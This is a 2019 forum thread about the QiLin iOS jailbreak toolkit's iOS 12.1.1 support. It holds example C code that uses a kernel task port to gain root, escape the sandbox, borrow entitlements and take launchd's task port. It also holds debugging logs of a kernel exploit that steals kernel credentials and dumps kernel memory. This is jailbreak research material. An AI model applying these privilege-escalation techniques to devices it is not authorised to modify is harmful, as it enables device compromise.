QiLin now supports iOS 12.1.1

Discussion of the QiLin Toolkit. Requests for features and bug reports welcome.

QiLin now supports iOS 12.1.1

Postby morpheus » Sun Feb 03, 2019 11:02 pm

Tested on an iPhone XS Max and an iPad 6,8. Got offsets for most all devices, though.

No remount, but ShaiHulud/Platformize/etc do work. Example code:
Code:

    #include <stdio.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <mach/mach.h>
    /* plus the QiLin toolkit's own header for initQiLin/rootifyMe/ShaiHuludMe/etc. */

    initQiLin(tfp0, KERNEL_BASE + kernel_slide);

    rootifyMe();
    ShaiHuludMe(0);
    // sanity check: as root with the sandbox lifted, /tmp is writable
    int test = open("/tmp/test", O_WRONLY | O_CREAT, 0644);   // O_CREAT requires a mode
    if (test < 0) perror("open");
    else { printf("Yep - %d\n", test); close(test); }

    uint64_t origCreds = 0;

    int wantBorrow = 1;
    if (wantBorrow) {
        origCreds = borrowEntitlementsFromDonor("/usr/bin/sysdiagnose", "-u");
    }

    // int rc = execCommand("/bin/ps", "-ef", NULL, NULL, NULL, NULL, 0);
    // rc = execCommand("/usr/sbin/ioreg", "-l", "-f", "-w", "0", NULL, 0);
    printf("PLATFORMIZING\n");
    platformizeMe();

    // you can now get any task in the system, e.g. launchd
    mach_port_t ld_task = MACH_PORT_NULL;
    kern_return_t kr = task_for_pid(mach_task_self(), 1, &ld_task);
    if (kr != KERN_SUCCESS) printf("task_for_pid: %s\n", mach_error_string(kr));
    printf("LD task: 0x%x\n", ld_task);

    // And spawn any command -
    int rc2 = execCommand("/sbin/mount", NULL, NULL, NULL, NULL, NULL, 0);
    int rc1 = execCommand("/bin/ps", "-ef", NULL, NULL, NULL, NULL, 0);

morpheus
Site Admin
 
Posts: 723
Joined: Thu Apr 11, 2013 6:24 pm

Re: QiLin now supports iOS 12.1.1

Postby saltthehash » Sun Feb 10, 2019 1:08 am

Thanks for this update!!! While trying to jailbreak with Brandon's exploit and QiLin, I found an issue in the kernel symbol table.

It seems that some of the symbol addresses that were added for iOS 12+ are null, and this causes symbol searching to end early before searching through the whole list. From what I can see in the binary, the first null symbol address is for iPod7,2 12.1.2. Once I patched the binary just to get my PoC working, everything seemed to work correctly. Thank you again!
saltthehash
 
Posts: 4
Joined: Sat Sep 15, 2018 2:44 am

Re: QiLin now supports iOS 12.1.1

Postby fr3nsis » Wed Feb 13, 2019 11:56 am

I'm trying on an iPhone 5s 12.1.1b3 but I have some troubles...
kernproc addr = 0xfffffff0172b5b00 (0xfffffff0088b5b00 without k_slide)
I have also tried to use setsymbol

Code:
2019-02-13 12:27:09.214369+0100 v3ntex[187:2629] STATUS: Got 64-bit kernel. Great
Please set kernproc now
2019-02-13 12:27:09.214506+0100 v3ntex[187:2629] STATUS: Loaded The QiLin Toolkit (Feb  3 2019 17:22:09) for Darwin 18.2.0 Darwin Kernel Version 18.2.0: Mon Nov 12 21:07:35 PST 2018; root:xnu-4903.232.2~2/RELEASE_ARM64_S5L8960X iPhone6,2 - iPhone
<CFBasicHash 0x28225ba80 [0x1f6e41610]>{type = mutable dict, count = 10,
entries =>
   0 : <CFString 0x28376a820 [0x1f6e41610]>{contents = "SystemImageID"} = <CFString 0x28225bac0 [0x1f6e41610]>{contents = "864C5304-5E7F-45E3-ABB1-C300D510BEA2"}
   1 : <CFString 0x1f6e63818 [0x1f6e41610]>{contents = "ProductBuildVersion"} = 16C5050a
   2 : BuildID = <CFString 0x28225ba00 [0x1f6e41610]>{contents = "DD55DC62-E71B-11E8-8FEF-63FF0EBD289E"}
   3 : <CFString 0x1f6e5d278 [0x1f6e41610]>{contents = "ProductCopyright"} = <CFString 0x283924a80 [0x1f6e41610]>{contents = "1983-2018 Apple Inc."}
   4 : <CFString 0x1f6e62f18 [0x1f6e41610]>{contents = "ProductVersion"} = 12.1.1
   5 : <CFString 0x1f6e54d78 [0x1f6e41610]>{contents = "ReleaseType"} = Beta
   6 : <CFString 0x1f6e7c358 [0x1f6e41610]>{contents = "Version"} = <CFString 0x1f6e7c358 [0x1f6e41610]>{contents = "Version"}
   7 : <CFString 0x1f6e5aaf8 [0x1f6e41610]>{contents = "ProductName"} = iPhone OS
   8 : <CFString 0x1f6e7c378 [0x1f6e41610]>{contents = "Build"} = <CFString 0x1f6e7c378 [0x1f6e41610]>{contents = "Build"}
   9 : <CFString 0x1f6e7c2b8 [0x1f6e41610]>{contents = "FullVersionString"} = <CFString 0x282225c00 [0x1f6e41610]>{contents = "Version 12.1.1 (Build 16C5050a)"}
}
looking for me..
CAN'T FIND OFFSET OF KERNEL SYMBOL _kernproc for iPhone6,2, 12.1.1 in 157 entries
2019-02-13 12:27:09.288704+0100 v3ntex[187:2629] Can't find symbol _kernproc ...
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
SH2:
looking for me..
CAN'T FIND OFFSET OF KERNEL SYMBOL _kernproc for iPhone6,2, 12.1.1 in 157 entries
2019-02-13 12:27:09.289869+0100 v3ntex[187:2629] Can't find symbol _kernproc ...
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
Yep - 3


I have patched the QiLin binary with the offset but it won't work

Code:
2019-02-13 15:09:31.007779+0100 v3ntex[195:2858] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5b00 + 0x3200000
looking for me..
2019-02-13 15:09:31.013648+0100 v3ntex[195:2858] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5b00 + 0x3200000
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
KernCredAddr : 0x0 (offset 0xf8). OffsetOf p_comm : 0x250
PID 195 not found
fr3nsis
 
Posts: 3
Joined: Tue Jan 15, 2019 8:56 am

Re: QiLin now supports iOS 12.1.1

Postby fr3nsis » Wed Feb 13, 2019 3:25 pm

Patching QiLin with the IDA address now seems to work.

kernproc_addr=0xfffffff01e2b5b00
Kernel slide: 0x15a00000
kernproc_addr - slide => 0xfffffff0088b5b00 does not work
0xfffffff0088b5ef8 works

Code:
kern=Darwin Kernel Version 18.2.0: Mon Nov 12 21:07:35 PST 2018; root:xnu-4903.232.2~2/RELEASE_ARM64_S5L8960X
page size: 0x1000, (os/kern) successful
real pipecnt=0x500
service: 5903
client: 5e07, (os/kern) successful
newSurface: (os/kern) successful
stuffport: 5f03, (os/kern) successful
mach_port_insert_right: (os/kern) successful
mach_msg: (os/kern) successful
herp derp
task_swap_mach_voucher: (os/kern) successful
my_gc breaking at 2425 with tdiff=4421
port_address=0xfffffff00972cca0
fake_voucher_idx=7134
fake_voucher_jdx=32
Shifted Port!
kport.ip_kobject=0xfffffff00982c700
sprayed pipecnt=0x500
targetVoucher->iv_port=0xfffffff00982c000
final buf realloc :o
reallocate_buf: (os/kern) successful
replaceing real_port_to_fake_voucher...
old real_port_to_fake_voucher=3480323
new real_port_to_fake_voucher=3190275
p->ip_srights=100
gfakeport_idx=109
useport_addr=0xfffffff00972cbf8
doing first kread...
test=0x6580000002
realport_addr=0xfffffff003afbe98
itk_space=0xfffffff00442a420
self_task=0xfffffff0017c75a0
IOSurfaceRootUserClient_port=0xfffffff003afbd48
IOSurfaceRootUserClient_addr=0xfffffff0050c5470
IOSurfaceRootUserClient_vtab=0xfffffff01ce9fcb0
Kernel base: 0xfffffff01ca04000
Kernel Magic: 0xfeedfacf
Kernel slide: 0x15a00000
zone_map_addr=0xfffffff078c4c6b0
kport.ip_kobject=0xfffffff00982c100
remapping fakeport
shmem_addr: 0x0000000100eec000
dumping vtab...
kernel_task=0xfffffff000b9cc20, (os/kern) successful
kernproc_addr=0xfffffff01e2b5b00, (os/kern) successful
kern_ucred=0xfffffff000e7aa70, (os/kern) successful
self_proc=0xfffffff0037adbe8, (os/kern) successful
self_ucred=0xfffffff001cacfc0, (os/kern) successful
uid: 501
copyin=(os/kern) successful
stole the kernel's credentials
uid: 0
realhost: 30af03 (host: 1303)
kernel_map=0xfffffff078c4c7c8, (os/kern) successful
ipc_space_kernel=0xfffffff000b81e00, (os/kern) successful
zm_range: fffffff000961000-fffffff01618e000, (os/kern) successful
zm_task_addr=0xfffffff00982c100
km_task_addr=0xfffffff00982c400
zm_port addr: 0xfffffff00a16c418
km_port addr: 0xfffffff00a16ac78
copyin=(os/kern) successful
mach_ports_lookup: (os/kern) successful
zone_map port: 30b003
kernel_map port: 349303
copyin=(os/kern) successful
mach_vm_remap: (os/kern) successful
remap_addr: 0xfffffff0008fcc20
mach_vm_wire: (os/kern) successful
newport=0xfffffff00a16abd0
copyin=(os/kern) successful
kernel_task=30b103, (os/kern) successful
cleaning up...
2019-02-13 15:47:26.057549+0100 v3ntex[195:2838] STATUS: Got 64-bit kernel. Great
Please set kernproc now
2019-02-13 15:47:26.057679+0100 v3ntex[195:2838] STATUS: Loaded The QiLin Toolkit (Feb  3 2019 17:22:09) for Darwin 18.2.0 Darwin Kernel Version 18.2.0: Mon Nov 12 21:07:35 PST 2018; root:xnu-4903.232.2~2/RELEASE_ARM64_S5L8960X iPhone6,2 - iPhone
<CFBasicHash 0x28097b4c0 [0x1d942d610]>{type = mutable dict, count = 10,
entries =>
   0 : <CFString 0x281c51180 [0x1d942d610]>{contents = "SystemImageID"} = <CFString 0x28097b3c0 [0x1d942d610]>{contents = "864C5304-5E7F-45E3-ABB1-C300D510BEA2"}
   1 : <CFString 0x1d944f818 [0x1d942d610]>{contents = "ProductBuildVersion"} = 16C5050a
   2 : BuildID = <CFString 0x28097b600 [0x1d942d610]>{contents = "DD55DC62-E71B-11E8-8FEF-63FF0EBD289E"}
   3 : <CFString 0x1d9449278 [0x1d942d610]>{contents = "ProductCopyright"} = <CFString 0x281200570 [0x1d942d610]>{contents = "1983-2018 Apple Inc."}
   4 : <CFString 0x1d944ef18 [0x1d942d610]>{contents = "ProductVersion"} = 12.1.1
   5 : <CFString 0x1d9440d78 [0x1d942d610]>{contents = "ReleaseType"} = Beta
   6 : <CFString 0x1d9468358 [0x1d942d610]>{contents = "Version"} = <CFString 0x1d9468358 [0x1d942d610]>{contents = "Version"}
   7 : <CFString 0x1d9446af8 [0x1d942d610]>{contents = "ProductName"} = iPhone OS
   8 : <CFString 0x1d9468378 [0x1d942d610]>{contents = "Build"} = <CFString 0x1d9468378 [0x1d942d610]>{contents = "Build"}
   9 : <CFString 0x1d94682b8 [0x1d942d610]>{contents = "FullVersionString"} = <CFString 0x28097b1c0 [0x1d942d610]>{contents = "Version 12.1.1 (Build 16C5050a)"}
}
2019-02-13 15:47:26.067304+0100 v3ntex[195:2838] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5ef8 + 0x15a00000
2019-02-13 15:47:26.067418+0100 v3ntex[195:2838] Find:18446744005496233720
looking for me..
2019-02-13 15:47:26.067624+0100 v3ntex[195:2838] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5ef8 + 0x15a00000
0xfffffff01e2b5b00 00 00 00 00 00 00 00 00    0xfffffff0013cf7f0   ..........<.....
0xfffffff01e2b5b10    0xfffffff000b9cc20      0xfffffff01e2b5b00    ........[+.....
0xfffffff01e2b5b20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b50 00 00 00 00 00 00 00 00 00 00 00 22 00 00 00 00 ..........."....
0xfffffff01e2b5b60 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b70    0xfffffff01e2b5f48   00 00 00 00 00 00 00 00 H_+.............
0xfffffff01e2b5b80 00 00 00 00 00 00 00 00    0xfffffff0013cf7f0   ..........<.....
0xfffffff01e2b5b90    0xfffffff000ba9530      0xfffffff000ba96a8   0...............
0xfffffff01e2b5ba0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5bb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5bc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5bd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5be0 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 ..."............
0xfffffff01e2b5bf0 00 00 00 22 00 00 00 00    0xfffffff000e7aa70   ..."....p.......
0xfffffff01e2b5c00    0xfffffff01e2b60e0      0xfffffff01e2b6200   .`+......b+.....
0xfffffff01e2b5c10    0xfffffff01e2b6168      0xfffffff01e2b63b8   ha+......c+.....
0xfffffff01e2b5c20 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c30 00 00 00 00 00 00 00 00 00 00 00 00 04 02 00 00 ................
0xfffffff01e2b5c40 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5ca0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5ce0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cf0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d40 00 00 00 00 00 80 48 18 00 00 00 00 15 00 00 00 ......H.........
0xfffffff01e2b5d50 6b 65 72 6e 65 6c 5f 74 61 73 6b 00 00 00 00 00 kernel_task.....
0xfffffff01e2b5d60 00 6b 65 72 6e 65 6c 5f 74 61 73 6b 00 00 00 00 .kernel_task....
0xfffffff01e2b5d70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d80 00 00 00 00 00 00 00 00    0xfffffff01e2b5f38   ........8_+.....
0xfffffff01e2b5d90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5da0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5dc0    0xfffffff01e2b5db8   00 00 00 00 00 00 00 00 .]+.............
0xfffffff01e2b5dd0    0xfffffff01e2b5dc8   00 00 00 00 00 00 00 00 .]+.............
0xfffffff01e2b5de0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5df0 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ................
0xfffffff01e2b5e00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5e10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5e20 00 00 00 00 00 00 00 00 c4 2d 64 5c 00 00 00 00 .........-d\....
0xfffffff01e2b5e30 e0 4a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 .J..............
0xfffffff01e2b5e40 00 00 00 00 00 00 00 00
KernCredAddr : 0xfffffff000e7aa70 (offset 0xf8). OffsetOf p_comm : 0x250
2019-02-13 15:47:26.074735+0100 v3ntex[195:2838] DEBUG: Process 0@0xfffffff01e2b5b00 - kernel_task
2019-02-13 15:47:26.074997+0100 v3ntex[195:2838] DEBUG: Process 1@0xfffffff0013cf7f0 - launchd
2019-02-13 15:47:26.075036+0100 v3ntex[195:2838] DEBUG: Process 19@0xfffffff0013cfbe8 - syslogd
2019-02-13 15:47:26.075139+0100 v3ntex[195:2838] DEBUG: Process 20@0xfffffff0013cf3f8 - UserEventAgent
2019-02-13 15:47:26.075176+0100 v3ntex[195:2838] DEBUG: Process 21@0xfffffff0013cf000 - assistantd
2019-02-13 15:47:26.075211+0100 v3ntex[195:2838] DEBUG: Process 22@0xfffffff0017313f8 - wifiFirmwareLoad
2019-02-13 15:47:26.075245+0100 v3ntex[195:2838] DEBUG: Process 23@0xfffffff001731000 - fseventsd
2019-02-13 15:47:26.075366+0100 v3ntex[195:2838] DEBUG: Process 24@0xfffffff0017317f0 - mediaserverd
2019-02-13 15:47:26.075400+0100 v3ntex[195:2838] DEBUG: Process 25@0xfffffff001731be8 - coreauthd
2019-02-13 15:47:26.075433+0100 v3ntex[195:2838] DEBUG: Process 26@0xfffffff0017457f0 - mediaremoted
2019-02-13 15:47:26.075466+0100 v3ntex[195:2838] DEBUG: Process 27@0xfffffff001745be8 - mstreamd
2019-02-13 15:47:26.075499+0100 v3ntex[195:2838] DEBUG: Process 28@0xfffffff0017453f8 - routined
2019-02-13 15:47:26.075532+0100 v3ntex[195:2838] DEBUG: Process 29@0xfffffff001745000 - misd
2019-02-13 15:47:26.075565+0100 v3ntex[195:2838] DEBUG: Process 30@0xfffffff0017553f8 - configd
2019-02-13 15:47:26.075598+0100 v3ntex[195:2838] DEBUG: Process 31@0xfffffff0017557f0 - healthd
2019-02-13 15:47:26.075631+0100 v3ntex[195:2838] DEBUG: Process 32@0xfffffff001755be8 - wifivelocityd
2019-02-13 15:47:26.075665+0100 v3ntex[195:2838] DEBUG: Process 33@0xfffffff001755000 - powerd
2019-02-13 15:47:26.075877+0100 v3ntex[195:2838] DEBUG: Process 34@0xfffffff0017673f8 - atc
2019-02-13 15:47:26.075912+0100 v3ntex[195:2838] DEBUG: Process 35@0xfffffff0017677f0 - WirelessRadioMan
2019-02-13 15:47:26.075945+0100 v3ntex[195:2838] DEBUG: Process 37@0xfffffff001767be8 - keybagd
2019-02-13 15:47:26.075978+0100 v3ntex[195:2838] DEBUG: Process 38@0xfffffff0017873f8 - familynotificati
2019-02-13 15:47:26.076145+0100 v3ntex[195:2838] DEBUG: Process 39@0xfffffff0017877f0 - DumpPanic
2019-02-13 15:47:26.076197+0100 v3ntex[195:2838] DEBUG: Process 40@0xfffffff001787be8 - wifid
2019-02-13 15:47:26.076235+0100 v3ntex[195:2838] DEBUG: Process 41@0xfffffff001787000 - logd
2019-02-13 15:47:26.076324+0100 v3ntex[195:2838] DEBUG: Process 42@0xfffffff001797be8 - fud
2019-02-13 15:47:26.076361+0100 v3ntex[195:2838] DEBUG: Process 43@0xfffffff0017977f0 - installd
2019-02-13 15:47:26.076394+0100 v3ntex[195:2838] DEBUG: Process 44@0xfffffff0017973f8 - mobiletimerd
2019-02-13 15:47:26.076428+0100 v3ntex[195:2838] DEBUG: Process 45@0xfffffff001797000 - softwareupdated
2019-02-13 15:47:26.076541+0100 v3ntex[195:2838] DEBUG: Process 46@0xfffffff0017ac3f8 - seld
2019-02-13 15:47:26.076575+0100 v3ntex[195:2838] DEBUG: Process 47@0xfffffff0017ac7f0 - identityservices
2019-02-13 15:47:26.076610+0100 v3ntex[195:2838] DEBUG: Process 49@0xfffffff0017acbe8 - wcd
2019-02-13 15:47:26.076644+0100 v3ntex[195:2838] DEBUG: Process 50@0xfffffff0017c67f0 - SpringBoard
2019-02-13 15:47:26.076677+0100 v3ntex[195:2838] DEBUG: Process 52@0xfffffff0017c63f8 - askpermissiond
2019-02-13 15:47:26.076711+0100 v3ntex[195:2838] DEBUG: Process 53@0xfffffff0017c6000 - wirelessproxd
2019-02-13 15:47:26.076745+0100 v3ntex[195:2838] DEBUG: Process 54@0xfffffff0017e3000 - backboardd
2019-02-13 15:47:26.076778+0100 v3ntex[195:2838] DEBUG: Process 55@0xfffffff0017e33f8 - sharingd
2019-02-13 15:47:26.076810+0100 v3ntex[195:2838] DEBUG: Process 56@0xfffffff0017e37f0 - timed
2019-02-13 15:47:26.076844+0100 v3ntex[195:2838] DEBUG: Process 57@0xfffffff0017e3be8 - locationd
2019-02-13 15:47:26.076941+0100 v3ntex[195:2838] DEBUG: Process 58@0xfffffff0017f6000 - containermanager
2019-02-13 15:47:26.077002+0100 v3ntex[195:2838] DEBUG: Process 59@0xfffffff0017f63f8 - imagent
2019-02-13 15:47:26.077050+0100 v3ntex[195:2838] DEBUG: Process 60@0xfffffff0017f67f0 - assertiond
2019-02-13 15:47:26.077084+0100 v3ntex[195:2838] DEBUG: Process 61@0xfffffff0017f6be8 - cloudpaird
2019-02-13 15:47:26.077117+0100 v3ntex[195:2838] DEBUG: Process 62@0xfffffff001814be8 - mobilewatchdog
2019-02-13 15:47:26.077161+0100 v3ntex[195:2838] DEBUG: Process 63@0xfffffff0018147f0 - lockdownd
2019-02-13 15:47:26.077194+0100 v3ntex[195:2838] DEBUG: Process 64@0xfffffff0018143f8 - aggregated
2019-02-13 15:47:26.077227+0100 v3ntex[195:2838] DEBUG: Process 65@0xfffffff001814000 - OTACrashCopier
2019-02-13 15:47:26.077261+0100 v3ntex[195:2838] DEBUG: Process 66@0xfffffff001822000 - AppleCredentialM
2019-02-13 15:47:26.077445+0100 v3ntex[195:2838] DEBUG: Process 67@0xfffffff0018223f8 - ptpd
2019-02-13 15:47:26.077544+0100 v3ntex[195:2838] DEBUG: Process 68@0xfffffff0018227f0 - navd
2019-02-13 15:47:26.077645+0100 v3ntex[195:2838] DEBUG: Process 69@0xfffffff001822be8 - budd
2019-02-13 15:47:26.077682+0100 v3ntex[195:2838] DEBUG: Process 70@0xfffffff00183a7f0 - rapportd
2019-02-13 15:47:26.077715+0100 v3ntex[195:2838] DEBUG: Process 72@0xfffffff00183a3f8 - bluetoothd
2019-02-13 15:47:26.077748+0100 v3ntex[195:2838] DEBUG: Process 74@0xfffffff00184e7f0 - fairplayd.H2
2019-02-13 15:47:26.077782+0100 v3ntex[195:2838] DEBUG: Process 75@0xfffffff00184e3f8 - CommCenter
2019-02-13 15:47:26.077814+0100 v3ntex[195:2838] DEBUG: Process 76@0xfffffff00184ebe8 - notifyd
2019-02-13 15:47:26.077847+0100 v3ntex[195:2838] DEBUG: Process 77@0xfffffff00184e000 - cfprefsd
2019-02-13 15:47:26.077880+0100 v3ntex[195:2838] DEBUG: Process 78@0xfffffff00183abe8 - distnoted
2019-02-13 15:47:26.077913+0100 v3ntex[195:2838] DEBUG: Process 79@0xfffffff0017c6be8 - lsd
2019-02-13 15:47:26.077945+0100 v3ntex[195:2838] DEBUG: Process 80@0xfffffff001f01be8 - dmd
2019-02-13 15:47:26.078075+0100 v3ntex[195:2838] DEBUG: Process 81@0xfffffff001f017f0 - aslmanager
2019-02-13 15:47:26.078110+0100 v3ntex[195:2838] DEBUG: Process 82@0xfffffff001f013f8 - awdd
2019-02-13 15:47:26.078142+0100 v3ntex[195:2838] DEBUG: Process 83@0xfffffff001f01000 - securityd
2019-02-13 15:47:26.078176+0100 v3ntex[195:2838] DEBUG: Process 84@0xfffffff002297000 - nehelper
2019-02-13 15:47:26.078208+0100 v3ntex[195:2838] DEBUG: Process 85@0xfffffff0022973f8 - mobileassetd
2019-02-13 15:47:26.078241+0100 v3ntex[195:2838] DEBUG: Process 86@0xfffffff0022977f0 - CloudKeychainPro
2019-02-13 15:47:26.078274+0100 v3ntex[195:2838] DEBUG: Process 87@0xfffffff002297be8 - akd
2019-02-13 15:47:26.078307+0100 v3ntex[195:2838] DEBUG: Process 88@0xfffffff0023793f8 - nsurlsessiond
2019-02-13 15:47:26.078339+0100 v3ntex[195:2838] DEBUG: Process 89@0xfffffff0023797f0 - adid
2019-02-13 15:47:26.078372+0100 v3ntex[195:2838] DEBUG: Process 90@0xfffffff002379000 - nsurlstoraged
2019-02-13 15:47:26.078470+0100 v3ntex[195:2838] DEBUG: Process 91@0xfffffff002379be8 - dasd
2019-02-13 15:47:26.078504+0100 v3ntex[195:2838] DEBUG: Process 92@0xfffffff0024053f8 - mDNSResponder
2019-02-13 15:47:26.078538+0100 v3ntex[195:2838] DEBUG: Process 93@0xfffffff002405000 - pfd
2019-02-13 15:47:26.078705+0100 v3ntex[195:2838] DEBUG: Process 94@0xfffffff0024057f0 - MobileGestaltHel
2019-02-13 15:47:26.078742+0100 v3ntex[195:2838] DEBUG: Process 95@0xfffffff002405be8 - mDNSResponderHel
2019-02-13 15:47:26.078776+0100 v3ntex[195:2838] DEBUG: Process 96@0xfffffff0026e93f8 - cloudd
2019-02-13 15:47:26.078809+0100 v3ntex[195:2838] DEBUG: Process 97@0xfffffff0026e97f0 - nanoregistryd
2019-02-13 15:47:26.079460+0100 v3ntex[195:2838] DEBUG: Process 98@0xfffffff0026e9000 - coreduetd
2019-02-13 15:47:26.079502+0100 v3ntex[195:2838] DEBUG: Process 99@0xfffffff0026e9be8 - profiled
2019-02-13 15:47:26.079536+0100 v3ntex[195:2838] DEBUG: Process 100@0xfffffff00283a3f8 - ContextService
2019-02-13 15:47:26.079684+0100 v3ntex[195:2838] DEBUG: Process 101@0xfffffff00283a7f0 - apsd
2019-02-13 15:47:26.079717+0100 v3ntex[195:2838] DEBUG: Process 102@0xfffffff00283a000 - mobileactivation
2019-02-13 15:47:26.079752+0100 v3ntex[195:2838] DEBUG: Process 103@0xfffffff00283abe8 - OTATaskingAgent
2019-02-13 15:47:26.079785+0100 v3ntex[195:2838] DEBUG: Process 104@0xfffffff002a30be8 - carkitd
2019-02-13 15:47:26.079828+0100 v3ntex[195:2838] DEBUG: Process 105@0xfffffff002a307f0 - hangtracerd
2019-02-13 15:47:26.079861+0100 v3ntex[195:2838] DEBUG: Process 106@0xfffffff002a303f8 - MTLCompilerServi
2019-02-13 15:47:26.079894+0100 v3ntex[195:2838] DEBUG: Process 107@0xfffffff002a30000 - MTLCompilerServi
2019-02-13 15:47:26.079928+0100 v3ntex[195:2838] DEBUG: Process 108@0xfffffff00183a000 - tccd
2019-02-13 15:47:26.080069+0100 v3ntex[195:2838] DEBUG: Process 109@0xfffffff002ba87f0 - BlueTool
2019-02-13 15:47:26.080151+0100 v3ntex[195:2838] DEBUG: Process 110@0xfffffff002ba83f8 - trustd
2019-02-13 15:47:26.080341+0100 v3ntex[195:2838] DEBUG: Process 111@0xfffffff002ba8000 - contextstored
2019-02-13 15:47:26.080379+0100 v3ntex[195:2838] DEBUG: Process 113@0xfffffff002f357f0 - geod
2019-02-13 15:47:26.080413+0100 v3ntex[195:2838] DEBUG: Process 114@0xfffffff002f353f8 - accountsd
2019-02-13 15:47:26.080446+0100 v3ntex[195:2838] DEBUG: Process 115@0xfffffff002f35000 - biometrickitd
2019-02-13 15:47:26.080480+0100 v3ntex[195:2838] DEBUG: Process 116@0xfffffff002f35be8 - symptomsd
2019-02-13 15:47:26.080513+0100 v3ntex[195:2838] DEBUG: Process 117@0xfffffff0032787f0 - calaccessd
2019-02-13 15:47:26.080546+0100 v3ntex[195:2838] DEBUG: Process 118@0xfffffff003278be8 - ctkd
2019-02-13 15:47:26.080579+0100 v3ntex[195:2838] DEBUG: Process 119@0xfffffff0032783f8 - pkd
2019-02-13 15:47:26.080612+0100 v3ntex[195:2838] DEBUG: Process 120@0xfffffff003278000 - medialibraryd
2019-02-13 15:47:26.080646+0100 v3ntex[195:2838] DEBUG: Process 121@0xfffffff0033c37f0 - misagent
2019-02-13 15:47:26.080679+0100 v3ntex[195:2838] DEBUG: Process 122@0xfffffff0033c33f8 - MobileStorageMou
2019-02-13 15:47:26.080796+0100 v3ntex[195:2838] DEBUG: Process 123@0xfffffff0033c3000 - setoken
2019-02-13 15:47:26.080831+0100 v3ntex[195:2838] DEBUG: Process 125@0xfffffff0035e53f8 - tailspind
2019-02-13 15:47:26.080864+0100 v3ntex[195:2838] DEBUG: Process 126@0xfffffff0035e5000 - analyticsd
2019-02-13 15:47:26.080897+0100 v3ntex[195:2838] DEBUG: Process 127@0xfffffff0035e57f0 - AGXCompilerServi
2019-02-13 15:47:26.080930+0100 v3ntex[195:2838] DEBUG: Process 128@0xfffffff0035e5be8 - callservicesd
2019-02-13 15:47:26.080964+0100 v3ntex[195:2838] DEBUG: Process 130@0xfffffff0039613f8 - duetexpertd
2019-02-13 15:47:26.080997+0100 v3ntex[195:2838] DEBUG: Process 131@0xfffffff0039617f0 - passd
2019-02-13 15:47:26.081041+0100 v3ntex[195:2838] DEBUG: Process 133@0xfffffff0038b43f8 - IMDPersistenceAg
2019-02-13 15:47:26.081074+0100 v3ntex[195:2838] DEBUG: Process 134@0xfffffff0038b47f0 - syncdefaultsd
2019-02-13 15:47:26.081107+0100 v3ntex[195:2838] DEBUG: Process 135@0xfffffff0038b4be8 - companion_proxy
2019-02-13 15:47:26.081334+0100 v3ntex[195:2838] DEBUG: Process 136@0xfffffff0038b4000 - afcd
2019-02-13 15:47:26.081373+0100 v3ntex[195:2838] DEBUG: Process 137@0xfffffff003d893f8 - useractivityd
2019-02-13 15:47:26.081504+0100 v3ntex[195:2838] DEBUG: Process 138@0xfffffff003d897f0 - lsdiconservice
